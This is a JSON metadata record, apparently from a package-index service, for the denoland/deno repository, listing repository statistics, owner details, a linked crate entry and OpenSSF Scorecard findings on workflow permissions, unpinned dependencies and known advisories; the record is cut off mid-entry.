{"id":378950,"url":"https://github.com/denoland/deno","last_synced_at":"2026-09-08T23:30:18.812Z","repository":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"packages":[{"id":5858421,"name":"pacup","ecosystem":"cargo","description":"Help maintainers update pacscripts","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:15:53.239Z","latest_release_published_at":"2023-01-11T08:22:33.605Z","latest_release_number":"2.0.0","last_synced_at":"2026-09-07T22:53:44.164Z","created_at":"2023-01-11T08:24:13.993Z","updated_at":"2026-09-07T22:53:44.164Z","registry_url":"https://crates.io/crates/pacup/","install_command":"cargo install pacup","documentation_url":"https://docs.rs/pacup/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: 